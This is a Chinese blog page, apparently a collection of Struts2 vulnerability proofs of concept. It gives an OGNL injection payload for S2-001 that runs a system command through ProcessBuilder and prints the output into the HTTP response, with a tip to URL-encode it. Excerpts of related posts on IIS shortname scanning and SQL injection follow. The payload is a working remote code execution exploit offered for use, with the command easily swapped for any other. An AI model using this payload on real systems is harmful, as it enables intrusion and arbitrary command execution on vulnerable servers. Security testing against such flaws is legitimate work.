首页 > 其他分享 >Struct2系列漏洞POC整理

Struct2系列漏洞POC整理

时间:2023-05-29 10:13:38浏览次数:43  
标签:lang java getWriter 漏洞 io new Struct2 POC

Struct2 -001

%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"pwd"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}

有的时候需要urlencode一下才能使用。
利用截图:
image

标签:lang,java,getWriter,漏洞,io,new,Struct2,POC
From: https://www.cnblogs.com/ssh1y/p/17439622.html

相关文章

  • IIS短文件名暴力枚举漏洞利用工具(IIS shortname Scanner)
    脚本可以测试对应的URL是否存在漏洞,若存在漏洞,则猜解文件夹下所有的短文件名:包括文件和文件名。网上早前已经有公开的工具了:https://code.google.com/p/iis-shortname-scanner-poc/我没有参考他的代码。自己用python实现了一个漏洞利用脚本。简单测试,发现比上面的POC能猜解到更......
  • WEB漏洞—SQL注入之Oracle,MongoDB等注入
     1.明确注入数据库类型、权限2.明确提交方法、参数类型等高权限可以执行文件读取,低权限就老老实实获取数据,最终目的都是获取网站权限 常见数据库类型mysql,access,mssql,mongoDB,postgresql,sqlite,oracle,sybase等1、Access注入Access与mysql结构,除access之外,其他数据库结......
  • WEB漏洞—SQL注入之类型及提交注入
    本章包含所有sqli-labs-master测试,所以内容较少,更多内容在测试里GET,参考sqli-labs-matser(LESS-1到5)POST,参考sqli-labs-matser(LESS-11) COOKIE数据提交注入测试(sqli-labs-masterLESS-20)cookie注入原理:对get传递来的参数进行了过滤,但是忽略了cookie也可以传递参数。通过数......
  • web漏洞扫描器——AWVS
        ......
  • Nessus漏洞扫描工具手把手安装详细教程
    1.下载链接:http://www.tenable.com/products/nessus/select-your-operating-system选择与你的系统对应的版本uname-a#查看自己系统的版本这里是我选择的版本2.安装找到下载位置并打开终端执行以下命令:dpkg-i文件名按照提示进行操作:查看启动状态:netstat-nt......
  • 允许Traceroute探测漏洞修复
    vim/etc/sysconfig/iptables-AINPUT-picmp-micmp--icmp-typetime-exceeded-jDROP-AOUTPUT-picmp-micmp--icmp-typetime-exceeded-jDROP重启iptables服务:systemctlrestartiptables检查新添加的规则是否有效,检查命令:iptables-L-n......
  • 未授权访问漏洞检测工具(CVE-2023-29922)
    ===================================免责声明请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。0x01工具介绍PowerJob<=4.3.2......
  • Web安全透测试 掌握绝大多数Web漏洞原理及防手段-鸿雁长飞光不度
    Web安全渗测试掌握绝大多数Web漏洞原理及防手段download:3w51xuebccom使用Netty和SpringBoot实现仿微信的示例在本文中,我们将使用Netty和SpringBoot框架来创建一个简单的聊天应用程序,类似于微信。这个应用程序将支持多用户聊天和即时消息发送。下面让我们来一步步看看如何实现......
  • 自动化漏洞扫描工具使用指南
    作为企业的IT安全管理员,您的重要任务之一,一定离不开全面的漏洞管理。即,全方位地评估、报告和缓解企业内部技术栈中,存在的各项安全弱点和网络威胁。而面对此类繁杂复杂的工作时,我们往往需要借助自动化的漏洞扫描程序,来更加高效地识别出潜在的弱点,并实现对于漏洞的基础性管理。从原理......
  • hvv蓝初面试常见漏洞问题(上)
    1.SQL注入漏洞成因:可控变量变量会带入数据库查询变量不存在过滤或者变量过滤不严格注入流程判断是否有注入点orderby判断字段数量unionselect报错查看注入点使用函数查看数据库相关信息注入分类:注入类型:报错、联合、盲注(布尔,时间)、堆叠注入提交方式:get,post,co......